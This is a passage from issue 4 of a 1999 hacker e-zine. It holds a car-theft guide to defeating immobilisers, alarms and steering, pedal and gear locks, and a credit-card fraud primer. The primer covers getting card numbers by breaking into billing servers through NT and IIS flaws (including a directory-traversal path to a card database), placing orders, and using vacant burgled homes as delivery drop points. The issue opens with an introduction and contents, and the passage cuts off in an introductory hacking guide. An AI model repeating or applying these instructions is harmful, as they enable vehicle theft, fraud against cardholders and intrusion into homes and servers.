___________ _______________________________________ ", / / ___ _.-'' '. / / / / /NDERGROUND> .' _ | / / / / / _______ / / \ / / / / / / / ___ \ / __/_.' / / / / / / / /__/ / /.-'' .' / / / / / / _____.' /_________..-' / / / / /___/ /_ / / / / / '.____ __/ / / | / / / / / / \ | _.' /__/ERIODICAL> / / '-._'..-'_______________________________/__..-' "We're on the Up and Up" :..:..::..Issue..::..:..: Issue 4 June 1999 :.::.::.:.Staff.:.::.::.: Cyborg - Editor HitMan - Writer Darkflame - Writer CrossFire - Writer :.::...Greetings To..::.: fORCE GPF#2 Zomba ZirQaz Rekcah HellBent Crypt0genic Firestarter :..::..:.Website.:..::..: http://www.ecad.org/up/ :..::..:..E-mail.:..::..: under_p@yahoo.com :..::.:.Subscribe.:.::..: upzine-subscribe@egroups.com :.:.Alternative Hosts.:.: http://www.ecad.org http://www.swateam.org http://www.tdshackers.com http://www.pinnacle-creations.com :..::..Introduction.::..: <*> You are reading the fourth issue of Underground Periodical (like you didn't already know that duh!). We're back again as usual bringing you our latest in opinions and technical information. Now, anybody who has visited our website might have noticed one thing... it's not very good! There is a new opening for a place joining the staff, Webmaster. We are inviting people to apply for a position redesigning our website in whatever way they see fit. Send a sample of your work and graphics or give us a URL to view your work to: under_p@yahoo.com. The best page designer will be given full creative control to conjour up some HTML that proves worthy of our high standard. Remember that you will have to design the graphics as well. <*> Well, as you might have noticed the changeover to ecad.org is finally complete. It is an excellent website based on computer security maintained by crypt0genic and rekcah who have been very generous with their web space and deserve some sort of trophy for all their efforts. If you'd like to host Underground Periodical on your website like the four alternative hosts above get in contact with us immediately. In return we will do all we can to help increase the traffic of your site. <*> We'd like to thank any and all people who submitted to Issue 4 or contributed in any way. Would you like to join them in flexing your writing talent and receiving our undying praise? If us staff members were to write it all on our own it would be, and lets face it, shite. Without continued support from the underground community we won't be able to keep on going. It's your magazine, so help it out a little. Anyway, on with this issue... :..::.:..Contents.:.::..: <*> 1 - Inroduction & Contents : Cyborg <*> 2 - Beating Car Alarms : Franco <*> 3 - Introduction To Carding : Axcess <*> 4 - Guide To Hacking : Mob Boss <*> 5 - Windows Security Holes : NeonBunny <*> 6 - Portsurfing Computers : Darkflame <*> 7 - The Virus File : HitMan <*> 8 - Editing The Registry : Cyborg <*> 9 - Making Macro Virii : Tefx <*> 10 - Elevator Beige Boxing : Holyblob <*> 11 - Windows 98 Flaw : HitMan <*> 12 - SMTP User Verifying : NeonBunny <*> 13 - You've Got Mail : Readers <*> 14 - Disclaimer & The End : Up Staff :..::..End Of File..::..: :..::..File 2 Of 14.::..: :...Beating Car Alarms..: :..::.:.By Franco.:.::..: <*> Car alarms, imobilisers and additional locks Can I just start by setting out the world of differnce between an imobiliser and a car alarm. Yes, I'm explaining it, there are some out there that don't actually know this so... An alarm is a device or, a series of devices, that have various guards, (siren, doors locks etc.) to deter or hinder the vehicle being driven away. The job of an imobiliser is to stop criminals from starting the engine and driving away. The various types are separated by the number of circuits. These circuits can be controlled brakes in electrical transmission to the engine and its components, starter motor, fuel pump etc. until it is disarmed. This array of circuit breaks is controlled by a series of electronic relays inside the imobiliser's black box, brain, which cuts the power. The most common setup in an imobiliser is that which comprises a transponder key fob. This is were near the ignition, fitted is an aerial receiver, when the transponder is passed close by it automatically sends a signal which when recognised allows the car's engine to start. In some cases the imobilisers, the car's engine will start but the gearbox movements will be inoperative and so... no go! (I) Imobilisers (II) General information on imobilisers and alarms (III) Alarms (IV) Additional locks (steering locks, gear locks and pedal locks) (I) IMOBILISERS These are fairly new line of car protection with the first few, proper imobilisers appearing around 1992. Nothing much has changed since really, all that's been developed is the more amount of cuts available and various features which can be associated to them. I'll get on to the SMART imobilisers at the end of this section. Now, imobilisers come in many different shapes and forms and manufacturers. For instance, if your target car has a sticker with the words "Protected by Clifford systems" or "CAT" then forget about it, as these are second to none and I've never heard of a car with this security being nicked so in all honesty you and I, yes I the master, wouldn't stand a chance! Imobilisers consist of three main parts, the brain, the power source (which can be independent of the car battery), the cuts and a siren of sorts, (this is optional for some). To beat them... well if we can because they are SERIOUSLY HARD to beat, depends on two main factors: (a) If its been installed DIY style and there's a mass of wires and indeed the imobiliser is visible and easy reach and the number of cuts to the engine. If its DIY style then hopefully it will of been installed far away from the bulkhead and with luck on your side visible. (b) If the stickers on the window say MOSS security or some low budget system then you will have better odds at beating the brain transponder and the aerial, also many of the low budgeters use only one circuit. Getting down to it... to un-imobilise you're gonna need one or two things: 1. your mate to keep an eye out as always. 2. wire cutters. 3. crocodile clips. 4. a bit of wire. 5. screwdrivers (assorted). 6. electrical tape. 7. 12 volt test meter. 8. some big balls and a lot of nerve. The imobiliser that I will be trying to show how to disarm is one that operates with a transponder key fob, though there are similarities in systems that don't incorporate this feature. SEE IMOBILISERS/ALARMS EXPALINED ABOVE AT THE START. METHOD NO 1. Now first off get into the car, once in, rip away at the underneath of the dash near the ignition. In an effort to confuse the criminal, some manufacturers only give the owner the wires in one colour, (black) which once the installer has removed the identification stickers, it leaves the perspective thief to cry and walk away unless they know, and I mean know, the system well and have bundles of time. Scan the wires leading from the imobiliser to the cut points which should be obvious as wires will of been spliced and cut and then re-joined again and the more evident this is the better your chances of success are, one sure way of finding cut points is by looking for different wire colours merged together or spend a bit of time with the old trusty meter. Once you've found these cut points, jam them together with tape to recreate the original circuit. ALL OF THE BREAKS MUST BE RESTORED BEFORE YOU CAN DIRVE AWAY. Then give the engine a try and... if you hear that sweet adrenaline pumping sound of an engine ticking over and running then, yes you're set to drive away, WUPEEEEEEEE! If not... fuck that! METHOD NO. 2. This were you locate the imobiliser circuits and attempt to restore the correct settings by trying to get the relays to switch over to the preffered settings. This is where it gets vague big style! What I suggest is that you attempt to do the above by means of electrical current from an external supply or if the relays are of consequent size, switch them by hand. Or... you could beat the crap out of it with a hammer though I don't think you'll find much success there! <*>-----------------------------------------------------------------<*> TIP If you want a vehicle with little hassle then don't go near a car with an imobiliser as working on imobilisers is a time consuming business with only a 38% chance of success (approx.). Also if the stickers on the window read the words "CAT" or "CLIFFORD" systems then walk away as they are second to none! <*>-----------------------------------------------------------------<*> (II) SMART IMOBILISERS/ALARMS The most recent and in many cases the most expensive incorporate various features such as auto locking doors and windows which locks them unless a specific code or device is inputted to the brain. Others include the rather drastic but very successful smoke imobilisers which can release a non harmful gas to imobilise the thief or hinder his/her view when trying to drive away. For those who want to kill any one who touches their car, the gases can be changed so that you die instead of being put temporally asleep and the owner will get off scott free! Some incorporate these, though there's a 99% chance that you'll never encounter this. Another is where the chair can be changed so that in the case of the car being stolen and if you don't input whatever into the brain, electrical elements within the chair will electrocute you until you're a sizzling mound of bone and fleshy goo, NASTY no? Another is where the car stereo can be set to blast you with whatever music to alert and draw attention to the thief. Imagine being caught in a car blaring out BILLIE at 90 decibels, embarrassing would not be the word. In a similar instance the imobiliser can be set to either ring or page the owner or police with a preprogrammed message such as "Help help. I'm being stolen my owners address is ?? and my G.P.S. position is ??" Yes someone can track your every move which brings me on to the TRACKER. This is what's known as a quiet alarm as it doesn't always notify the thief that the car is being tracked. The tracker rings or sends out a special distress signal to the police in the area and the cars every movement is logged and being watched as you drive and once the system is engaged the police will of already hopped into their Cossie response unit and will be up your arse before you know it! (III) ALARMS Well after that depressing reminder that imobilisers are hard you're gonna want to hear something nice and so... alarms are easier to beat depending on a couple of things, how many devices the alarm comprises of and whether or not it has it's own power supply and how well hidden it is. And so to a brief sum up of the devices incorporated in different alarms, a motion detector, door/bonnet/boot switches, timing circuits, steering movement, distance sensor, ride height and siren, (all of which can be tied into the entire system). All of these devices can be nasty if the system has its own power supply independent of the engine. To the methods... (I'M GONNA POINT OUT RIGHT NOW THAT THE OBVIOUS AND QUICKEST METHOD WITH 50% TO 70% SUCCESS WILL BE EXPLAINED BUT I FEEL THAT KNOWLEDGE SHOULD BE GAINED AND THAT YOU SHOULD EDUCATE YOURESELF RATHER THAN KNOWING THE BARE ESSENTIALS!) METHOD NO. 1. Based on the idea that the "ALARM RUNS OFF THE CAR BATTERY" either lift the bonnet up if you can without setting the alarm off, if at all possible or smash a window a pull the bonnet release catch inside the car. With practice your speed and confidence will increase. Once the bonnet is up then disconnect the positive or negative terminals or both. Don't let either terminals make contact with one another when one side is connected or you could have the battery blow up in your face, not very helpful when trying not to draw attention to yourself!!. Once disconnected enter the car as you like. You have two options on trying to locate the alarm box, either are very messy, rip away at the dash by the ignition approach or wherever the alarm is disarmed from and follow the wires back, the other way is to search the interior and engine bay frantically and with a bit of common sense and experience you will recognise the set patterns and placement of alarms and the devices and the physiology of it all which can and does speed up your technique. Now back to the job at hand, once you've neturalised the power source and found the alarm the idea is to gain access to it and either short it out (which can lead to various problems explained later), or try and disarm it by making the appropriate circuits electrically. To do this it's trusty meter time with a dollop of common sense and electronic sense mixed in. Bring to a boil and after examining the alarm's circuits, it should be obvious or at least you will have a suspicion of what circuits need opening and closing. And so you do this, reconnect the battery and drive away. <*>-----------------------------------------------------------------<*> TIP An alarm does not stop you from driving away in the car but it does hinder your driving in that some will cause headlights and windscreen wipers etc. to function regularly and make you stand out. A car in a blazing hot dry day with wipers going from side to side and lights flickering on incessantly would attract my attention for certain! <*>-----------------------------------------------------------------<*> METHOD NO. 2 Based on the premise that "THE ALARM HAS IT'S OWN POWER SUPPLY" you're gonna have to work EXTRA QUICK as undoubtedly once one of the alarm implements is violated or activated etc. the alarms going to go off and we can't have that for too long! Now after setting off the alarm your first priority is to disable the siren as this brings in the most amount of attention. Now this is where the physiology comes into play again, many people install the sirens under the bonnet with the idea that it will be heard a lot louder, and rightly so but this is where the exploit lies. When the siren first sounds from you opening the bonnet to looking for one or whatever, the siren although awkwardly placed most of the time it's easy to disarm with wire cutters. The owner's misconception is in as to what is good positioning of the sound device is that they will in many cases believe the more awkward it was for them to drill the pilot holes and wire up and install it, the harder it is for the criminal to cut the wires or disarm it by other means. The other fault is that many people who install them will think of it being made inoperative with the use of a clumsy 7lb lump hammer or crowbar which is hardly ever the case! With main alarm feature disabled, you move onto other important devices which may be restricting access to indicator use etc. This can be a major problem if you need the car for something inconspicuous and low key. All that you need to do in this case is simply rewire the indicators under the dash or wherever the alarm intersects the light circuits to the original. If you can't do this there and then as in most cases, just take the car to some quiet/safe spot and work on the circuits there or you could try your hand at the alarm circuits itself. I feel it prudent to point out the fact that if your seen driving a car that has its lights/windscreen wipers going on and off the police if in the area will pick this up straight away as its a direct sign that a car's alarm may still be partially active and they will of seen it time and time again. Also, removing the battery from the alarm isn't always a good idea because if the current is not flowing in some cases the circuits won't make and some vital features won't function, but with that being said if you were to use a null battery or complete the circuit with a low power source you might get away with it. So, disabling an independently powered alarm isn't all the headache as it seems. METHOD NO. 3 (THE EASY WAY!!!!!) This is where you open up the bonnet if the alarm runs off the car battery and you separate the alarms source of power form the rest of the cars and hey presto, the alarm stops and you're not noticed. <*>-----------------------------------------------------------------<*> TIP When trying to lift up bonnets without going inside of the car, it can be a good learning experience to go to scrap yards and familiarise on the movements and characteristics of different manufacturer's catches. Sounds sad to some people but there's nothing sad about quickening your entry times etc. into cars as a stay in prison and a criminal record sounds pretty sad to me! <*>-----------------------------------------------------------------<*> (IV) Steering wheel locks, gear locks and pedal locks (1) STEERING WHEEL LOCKS These are usually chosen by either the over cautious or those without any real form of defense for the car and are just trying to deter the opportunist. The locks come in many shapes and sizes with varying features i.e. the colour, yellow or light yellow. The principal behind them is that in the case of a steering lock that a bar for some strong titanium metal etc. is positioned such that the wheel cannot be turned more than one fifth turn approx. and effects the turning circle of the car making it impossible to drive round a 45 degree turn and greater. This is so when the bar which extends out from the lock is placed either across the wheel or dash. In the case of the dash the only way to free movement would be to cut a 360 circle around the steering column but then again you could ask the owner to give you the keys and kiss your ass and expect more joy, not bloody likely! If it's a bar across the steering wheel then it's easier but not much. Firstly in most cases the lock is put on the wrong way giving to much leeway or turn of the steering wheel, if this is the instance, you can cut away at the dash, it hits slash/move back or remove the seat which it will invariably hit and the piece of door trim in its path. Now those are the extreme cases if you have a lot of time to work on the car and intend on pissing the owner off and its in a secluded spot. Here comes the sensible option, you can either use the petrol cutter approach (you need a secluded car and it makes too much noise (ENOUGH SAID). Pick the lock or gouge away at the locking pieces of metal which form the actual lock. (a) Picking the lock (b) Disrupting the meeting pieces of metal which form the lock (c) I ALREADY SAID ENOUGH! (a) Picking the lock in many cases can be far easier and vice versa than performing approach (b). First off, if it is a new lock on the bar or steering wheel i.e. its one of those you see on a bicycle lock cryptinite, different to normal pin tumble style locks then either turn to the next step or walk away. I'm not kidding, those types of locks are almost impossible to pick! If on the other hand it locks like a normal lock, pin tumble them... you have a chance. Pick this the way you would any other lock of its style and with a bit of luck it should open. (b) To do this you will need a couple of tools, a couple of jimmies (crowbars), a strong screwdriver and in many cases a mate to hold and help. Got all these, great! Firstly examine the lock and attempt to determine whereabouts underneath the metal covering the two opposing locking metal prods are, if the cover is plastic then rip it off. The idea is that as you bend the metal covering of the steering wheel lock (in many cases part of the lock mechanism) such that the other piece of the lock becomes momentarily detached and has nothing opposing it's movement and that you can twist the lock apart. READ THIS AGAIN AND YOU'LL GET IT! I just want to sat right here that it is POSSIBLE for this to happen because I know someone who had it happen to him and the lock was only three years old and pretty impregnable, and they weren't exactly car thieves supreme. YES THEY WERE CAUGHT AND DEALT WITH BUT THAT'S ANOTHER STORY. (2) PEDAL LOCKS In this case depending on the age and manufacturer of the lock then it will be either cryptinite style or other. The same ideas apply as from part (b) and in some severe cases part (c). Another solution is to loosen the screws/bolts that hold the pedal concerned in place and slip it out of its locked state and replace. This though depends if the other end of the lock is still attached to the steering wheel which means you've still got a problem! The loosening of the pedal may also cause problems with tension that is needed for the appropriate pulling force on the actual accelerator under the bonnet to function and in many cases if not all, you will find it next to impossible (without the appropriate tensioning tools) to replace as the line will have been secured and taught with both attached etc. (3) GEAR LOCKS These style of locks are rapidly going out of use and there aren't all that many variants either. Again the same conditions etc. apply for (b) and (c) in severe instances. Though there is one exploit of the common gear lock, in many cars, such as Vauxhalls e.g. the Vauxhall Astra mk III the covering comes detached quite easily and if you can manage to remove and cut away at this then you may be able to slip and slide the hook off and result in free gear movemnets. There is one final exploit though, if you're working on a crappy budget car e.g. a Yugo (SHAME ON YOU. I HOPE THAT YOUR WORKING ON THE CAR TO BRING IT TO A SCARYARD OR CRUSHERS OR HOPING TO DRIVE IT OFF A CLIFF!) Anyway, the other avenue of choice is to try and locate the screws and/or bolts that hold the handbrake in place. If these are covered up by part of the lock and the metal looks too hard to bend then don't proceed. If though, you can see the screws or bolts then unfasten them so the handbrake unit becomes loose, now depending on the tension it remains questionable if you'll be able to cut the steel wire which will in turn leave the unit free to move and with fingers crossed will allow the gear stick to be moved side ways and back and fourth with the lock still attached. The "BIG" drawback is that you'll have no handbrake whatsoever! <*>-----------------------------------------------------------------<*> THE END That's all folks... for now. If you have any questions, corrections etc or just want to talk, you can e-mail me at crops@indigo.ie. BUB BYE... <*>-----------------------------------------------------------------<*> :..::..End Of File..::..: :..::..File 3 Of 14.::..: :Introduction To Carding: :..::.:.By Axcess.:.::..: <*> NOTES It's spelt axcess with a lowercase `a'; POSIX naming conventions, thank you. RipperTM is dead, axs lives on. Thanks for your time. <*> PREAMBLE This file deals with the fundamentals of Credit Card Fraud. We will try to cover all subjects here, but remember this is only a primer. Credit Card Fraud is one subject where real knowledge only comes from hands on experience. It is also the debut for my WFF File ID utility, which is part of the WFF file format suite. E-mail me for more info, or request my projects file. The line below stamps the file with an expiry, a categorisation, author, and contact address. WFF File ID is free, so get a copy off me now! {#1byt.dbsejoh/uyuÿ9:79ÿ7hzÿ2czuBhtggwm0eqoÿ9R€jwwr}*)Jw)Rw}{xm~l}rxw)}x)Lj{mrwpÿ8\}|wzqit{ÿ13715::ÿ3qrqh#} The official song for this article is Bedrock's Set In Stone from the Euphoria two CD set. Yeah, I always do that :). <*> INTRODUCTION First off, a few basic rules that should always be followed: a) Never card for profit. This is a big no-no, as in most countries, if you get caught, the penalty is far worse than doing it for personal use (sounds like drugs, doesn't it?) :) b) Never go over the cash limit on the card, and if you aren't sure of the cash limit, don't go over £400. This is just a precaution but if you want to risk it, you can go up to £1000. c) Never use a delivery address for longer than two weeks. Using it for any longer than above said is just too big a risk. I have had personal experience of this one, and it's not funny. d) Never tell your mates, el33t hax0r dud3z, your mum, cat, dog, girlfriend, or otherwise about what you are doing. This is a classic trust no-one case. If your mum asks you where you got that lovely flat screen, make up some bullshit, but never the truth. It is advisable to stick to internal goods if buying stuff for computers. Ok, I think we're just about ready to go on, don't you? :) <*> STEP 1: SEEK The process of getting the actual card numbers is almost always the most difficult part. Methods I have used successfully have included: o CompuServe (for countries with computerised signup) E-mails (bullshite). o Insecurities on Internet Billing Servers (recommended). o Picking information out of company accounts (very easy, but requires the company to bring you in to do work for them first). o Microsoft Windows NT/Transaction Server vulnerabilities (unlikely). o Trashing. (recommended). Another method I have never been desperate enough to try is burglary, it sucks because you aren't guaranteed a reward and also the risks involved are just too high. We will discuss all of these later. First you need to know the basic information you are trying to acquire: o Credit Card number. o Expiry date. o Postal address for holder. o Postal code. o Telephone number. The following information would be completely valid for transaction if it were real, i.e. All the information ever asked for is here: Number : 4921 1337 1337 1337 Start Date : Jan 1998 Expiry : Dec 2005 First : John Last : Dickson Telephone : (01222) 648223 Address 1 : 16 Longridge Court Address 2 : Stockingstown Address 3 : Cardiff Postal : CA11 2DF Now you know what to look for, lets get explaining the techniques in acquiring the information in the first place. CompuServe E-mails A bit of a shitty technique which I used only once. This requires you to be in a country that allows computerised account signup (currently all I think). Basically, sign up using fake details, although keep your name to something that sounds 'CompuServey', like "CompuServe Staff" or "Accounts Department". CompuServe's Credit Card validation system is not real-time, as of the size of the CompuServe network, so you can use fake Credit Card details that pass the standard simple validation algorithms. My favourite program for producing these numbers has to be Beazly's Number Generator which I can give you on request, although it is available from nearly every warez kiddie's web site in the world. After signing up, the idea is simple, compose an e-mail message that sounds very formal, then post it off to random addresses on the CompuServe network. Pretty basic eh? Pretty bollocks eh? Insecurities on Internet Billing Servers A difficult one, but the results are always 100% accurate and detection rates are near nil if you do it right. I won't go into much detail on this one here, as Cyborg said 4K and there are already hundreds of files on the subject. The basic technique is to find small online stores (and even sometimes big ones), then locating their billing server by submitting a dummy transaction and watching the addresses your web browser redirects between. Then, using a WinGate port scanner (one available from me), work out if the machine is an NT machine or not. If it is, see the section on Microsoft Windows NT. You can tell, because UNIXes don't usually have the NetBIOS ports (137-139) open and because if the machine is running a web service, it will report back "Microsoft IIS" or something like that if you Telnet to port 80. Using exploits, such as those found at RootShell or Fyodor's exploit world, gain access to the machine and retrieve the billing database. I told you I was going to be vague! Picking Information Out of Company Accounts. This must be the easiest of them all, as all that is required is Administrator access (if NT based) to the accounts machine, and while the employees aren't looking, just pull up Credit Card details for customers or the company (try under Sales and Purchase Ledgers). Microsoft Windows NT / Transaction Server Vulnerabilities. An NT based system that comes as part of Microsoft Back Office. There are two things you can do in this case, either: a) use the example administration forms that could possibly have been foolishly left on the server, or b) use one of the many NT server exploits available, such as one of the following popular ones: o The Red Button Exploit (ntsecurity.net) o The Active Server Pages hole (j.llibre@codetel.net.do) o The IIS Slash Problems (e.g.: domain.com/..\..\acc\cc.mdb) o Incorrectly Configured Index Servers (Rhino9's MHD). Theft or Burglary. Pure and simple theft, pick-pocketing or otherwise. Risks are high, chances of not getting what you want are high too, avoid it like the plague. Trashing This is not for the faint hearted (believe me)! Try to avoid homes if trashing, instead, find businesses, where there is more paper in the bins and less nappies, tampons, rotting fruit, and dog shit. <*> STEP 2: ORDERING The easiest method of ordering is with a company that has a fully computerised accounts/dispatch system, as no operators are involved. I know I was asked to write this for the global community, but I haven't got a clue about most other places, so I used British examples. Good examples of fully automated dispatch systems are: o Maplin CashTel Modem Dialup - you need an account first though, which simply requires you to place an order via telephone first. Hard. o Next http://www.next.co.uk/ I believe the following have full automation too, although I'm not too sure: o The Software Warehouse http://www.software-warehouse.co.uk/ o Sun Microsystems http://www.sun.com/. Rush out and get your copy of Solaris now while the offer is still on! o Microsoft You really need their URL? Probably - their actual Europe site is http://eu.microsoft.com/ o The Amazon http://www.amazon.com/ I wouldn't advise you try and order over the phone, it's just too suss. Another thing to note, some Internet sites and companies will call the owner of the Credit Card to confirm a redirection address. <*> STEP 3: SAFE-HOUSE Possibly the most important aspect of the job, the Safe House, must be perfect. If anything goes wrong with the Safe House, the whole operation is bust. Literally. Finding a Safe House is relatively hard, what you are looking for is one that is quite prominent, but at the same time quite isolated, empty, and will be empty for at least 20 days. Use any methods necessary (Trashing, bugging PCPs, etc.) to find out when the occupants will be vacating the house and when they will be back. Also try to find out where keys are stored, alarm codes, if people will be calling to check on it, etc. Try to build up a datasheet like the following (this is the one I use): Address : : : Post Code : Telephone : ( ) Fax : Alarm Code: Key Stored: Start Date: / / End Date : / / Notes : : : There's nothing wrong with assessing more than one house for a job, For a particular job I did a while ago, I had 3 extra houses at my disposal! <*> STEP 4: THE DELIVERY & PICK UP Having the goods delivered is a little step that must be done correctly otherwise you won't have a bollock were your goods are in transit. That makes you nervous. Good carriers to use are the ones that have check-up services that allow you find out where your goods are. Research these, then make sure you specify you want to use your own carrier when ordering. The ones I tend to use are ones with hubs as close to the Safe House as possible, I don't know why, but I always feel that it pays to be of the same locality as the driver. For instance, saying "All 'wight, mate?" to an English driver when you're from Northern Ireland always makes them give me dodgy looks, but then, that's probably just me :). Ok now, you've got the date of arrival for your goods, and it's time to make some preparation for the arrival. If you have information on the keys to the house and the alarm codes, use it to gain entry. Make yourself at home, pull the curtains back, switch off the timers, and if your in the mood, give the lawn a bit of a trim (joke!). Tidy the outside of the house a bit. Make sure there isn't anything obvious like notes left to the Milkman or Postman, etc. Remember, only 1 in 1000 jobs that the delivery man delivers will be fraudulent. He doesn't suspect a thing, so you shouldn't act suspicious either. Plus, he probably doesn't give a fuck if it is fraudulent or not. If you don't have any access information for the house, use some old fashioned brute force and ignorance; that's right, use your foot! Now, sit back, wait for the delivery man to come, sign for it, and run for it! Werd-up to Xio & Backa for excelling tekneiq, Project Venona for having me, Cyborg for making me write this, Madboar for STILL oweing me that beer (you know why)!, evilpinky for being a female, PC Plus for RHL 5.1, the US government for ARPANet, ARPANet for the Internet, the ISOC for the IETF, the IETF for HTTP, HTTP for all the cool stuff it's transferred to me, cool stuff for... you get the idea... ° Û ÛÛ° °ÛÛÛÛÛÛÛÛÛ ÛÛÛ ÛÛÛÛ° ßÛÛÛÛ ÜÜÜÜ ÜÛÜ ÛÛÛÛ° ÛÛÛÛ ßÛÛÛÛ ÜÛÛÛÛÛÛÜ °ÛÛÛÛ° ÛÛÛÛ ÛÛÛÛ° °ÛÛ° ²ÛÛÛÛ ÛÛÛÛ° ßÛÛÛÛ° ÛÛÛÛ ÛÛÛÛ ° ú ú ú ú ú úÛÛÛÛ°ú °ÛÛÛÛ ú ú ú ú úßÛÛÛÛ ÛÛÛ² ú ú ú ú ÛÛÛÛ° ú ú ú ú ú ú ú ú ú ú ú ú²ÛÛÛ°ú ú °ÛÛÛÜ ú ú ú ú ú úÛÛÛÛ ú ú ú ú ú ú ÛÛÛÛÛ° ú ú ú ú ú ú ú ú ú ú ÛÛÛÜÜÜÜÜÜÜÛÛÛÛ° ú ú ú ú úÛÛÛÛÛÛ° ú ú ú ú ú ú ÛÛÛÛÛ° ú ú ú ú ú ú ú ú ú ú²ÛÛÛ° ú ú ú úÛÛÛÛ² ú ú ú ÛÛÛ² ÛÛÛÛ ú ú ú ú ú ú °ÛÛÛÛ ú ú ú ú ú ú ú ú ÛÛÛ° ú ú ú ú úÛÛÛ ú ú ú ÛÛÛ° ÛÛÛÛ²ú ú ú ú ú ú ÛÛÛÛ ú ú ú ú ÛÛÛ °ÛÛÛ ÛÛÛ ßÛß °ÛÛÛÛß ÛÛ² °ÛÛÛ² °ÛÛÛÛ °²ÛÛÛÛß Û° ²ÛÛÛ² ²ÛÛ² °²ÛÛÛÜ °ÛÛÛÛ° ßÛÛß ²ÛÛ ßÛÛÛ° ÛÛÛÛÛ° ßÛ ÛÛÛÛÛÛ° [axcess] ° axs@freeuk.com "axcess has left the building" http://www.axs12.free-online.co.uk :..::..End Of File..::..: :..::..File 4 Of 14.::..: :.:..Guide To Hacking.:.: :..::..By Mob Boss..::..: *********************************************************************** THE MOB BOSS' GUIDE TO HACKING The Mob Boss *********************************************************************** I. Introduction Brief History of Hacking There is no set date in which you can say hacking was born. You may mark it with the first computer system being developed or with the birth of the UNIX operating system by AT&T. One thing can be sure, hacking has been around for a long time. Maybe not in the conventional way you may think of it, but its been around alright. I would like to start with the early 80's though. This is after the birth of UNIX, a time when people were running systems we may make fun of today. Although the hardware was primative this was what I consider the prime days of hacking. Long before AOL and even the world wide web was made for the use of the general idiots, woops I mean public. In these days information was spread through systems called BBSs, or Bulletin Board Systems. These systems offered chat, bulletin boards, and files. In these days you had more experienced hackers and phreakers (a phreaker is a phone hacker). People shared their knowledge of various computers they found, loop numbers, phone systems, and other such interesting things. If you really want to get a nostalgic point of few on I suggest you read the Anarchist Cookbook. It holds info still which would help you today but most of the texts, the orginal ones date back to the eighties and were actually distributed on BBSs. Back in these days there were only two ways to access systems remotely. One is through telenet, a network of computers from around the world with dialups in most major cities. The other way is a personal favorite of mine, wardialing. This is the process of dialing every phone number in a exchange (the first three digits of your seven digit phone number) looking for computer carriers. There are many things found while wardialing besides computers as well. Loop numbers (very rare these days), PBX's, test numbers, fax machines, and other interesting numbers all can be found by simply picking up your phone or having your wardialer do it for you. My personal favorite for wardialers is the DOS based TONELOC available throughout the web. Now wardialing is just plain fun for me these days but back in yesteryear that was the only way to hack. The interesting computer numbers were also traded among the people on the BBSs. Although I wasn't there for the grand old days of hacking I have first hand accounts from friends who were, and from texts I have read. One article that really shows how much fun those days were was a series of artilces called, Diary of a Hacker. These things were not as uncommon as you would think, I personally know someone who I met off the net who was a sysop on a BBS in those days. If you are new though keep in mind hacking has changed a lot since those days. What is Hacking? This question is one that I have thought about and have been asked about many times. My definition of a hacker is someone who is very knowledgable of various computer systems and how to work them in ways your every day user is ignorant of. A hacker is someone who pushes a system beyond its limits. This is a person who knows whats what and is ethical in his work as well. If you are new and haven't read an article on ethics then I suggest you do so. My article on ethics is available on my website at ( http://mobboss.dragx.cx ). Finally, a hacker is someone who uses the computer knowledge he has to gain even more knowledge. What hacking isn't This is where we seperate the smart hackers of the future from the faggots. I know Hollywood and the media may have given you some ideas about hacking that you may have liked. For the most part everything in the movies and on television is complete bullshit. Forget everything you saw in Hackers, Goldeneye, and Mission Impossible. These are all bullshit exagerations although the evil hacker, Boris in Goldeneye was pretty cool. Hacking isn't about stealing yourself shit, its not about taking revenge, and it is most certainly not about looking cool. God only knows you look like shit after spending a weekend behind the old terminal trying to access a certain server. Also no matter what your queer freinds at school have said, using a trojan horse to access a windows system is just plain pointless. If you do it, don't brag about it and don't spend too much time with it since is nothing but a waste of valuable time. If you are still interested then continue reading. Hacking as of April, 1999 Just to clue you new guys into whats going on in the hacking community these days. Most of your hacking and phreaking info is all on the web. There are still a few BBSs left, some even with telnet access on the web to save on that long distance bill. Usenet has become a wasteland of flaming for the most part, although you still find some knowledgable people among the ridiculous posts that come around. Web based chat such as AOL, Yahoo, and anything else like it has no knowledgable hackers, take my word for it. You will find nothing but big talking idiots there. Most systems aren't as weak as they used to be. So forget logging into remote computers without a password or as root:root like you may have read in a old article. Even techniques from the early ninetys are no good these days, one being the PHF exploit. Also is impossible to find a unshadowed password file these days so forget about it. Hacking is as hard as it ever was so don't get any false ideas of glory. II. First Steps The Library Believe it or not the library is most likely the best place to start your hacking career. Although they may appear useless these can be one of your best freinds. Your local library carries a wealth of information for the inspiring hacker or phreaker. First off among the many shitty books, there are many computer books on subjects ranging from various Operating Systems to telecommunications info. I suggest you take out some books on DOS, UNIX, and Windows 95/98/NT. Also I suggest you learn about TCP/IP and networking. Read as much as you can. Also at the library you will find many interesting directories such as the Haines Criss Cross Directory which lists phone numbers by addresses and numbers by names and all those vica verca. You may also decide to use the computers at the library for either anonymity while hacking or just for the pure pleasure of messing around with a LAN. Search Engines Now some of you brighter ones already know this but for the mentally less fortunate I will go over the wonderful powers of the almighty search engine. After looking in the library for books on hacking you most likely turned up nothing, thats why I didn't say to look that up. To find hacking info we head for the net. Now my personal favorite is www.altavista.com, I find that to have the most complete listing among all of the ones you see these days. Some things you wanna look up are hacking, phreaking, hacking texts, and computer security. Among these topics you will find good information and other things that are complete garbage. Just sort through that info and pick what you are most interested in. I do suggest though you don't bother with proggies. They are usually nothing more then a waste of time. The good stuff will come in the form of text files. Read everything you can get your hands on. IRC Now IRC can be fun or it can be dumb, its what you make out ofit. If you go on there occasionally to ask a couple questions, share some info, or to just hang out for a bit while your bored everything is fine. If you go on there though all the time just to argue your wasting your valuable time. Your best bet is to stay relatively partial. Why bother with flame wars that end up with nothing but wasted time that could have been better spent. Most people on there are bored and have nothing better to do then bother other people so before you sink to there level just think about that. USENET USENET has become a little worse in a the past few years. It has a lot of spam and a lot of dumb posts. Though once in a while you will see some intelligent Q & A, its a refreshing to see a break from the usual garbage once in a while. Now if you use newsgroups correctly this is a good way to get a question answered in within a day or two. Its all about not asking the wrong question. Read the groups FAQ's before posting and in all questions to anything relate to hacking stay away from AOL, Hotmail, and "How do I hack?" questions. These will just result in some flaming, thats it. Fitting In This can easy or this can be hard, it all depends on your personality. Some people just have a way about them that will piss off anyone. First thing is not to act like a newbie, attaching "I am a newbie" to each question is dumb. Thats not to say though you should act like you know more then you do either. There is a thin line you should walk. Also like I mentioned before there are some questions that should not be asked. Questions asking for someone to teach you to hack? Also questions about Hotmail and AOL are looked down upon as well. Not to mention people feel anyone who pays the high fees aol charges for shitty service is a complete moron so if you are using AOL expect some teasing for using that. Another thing, many hackers don't like 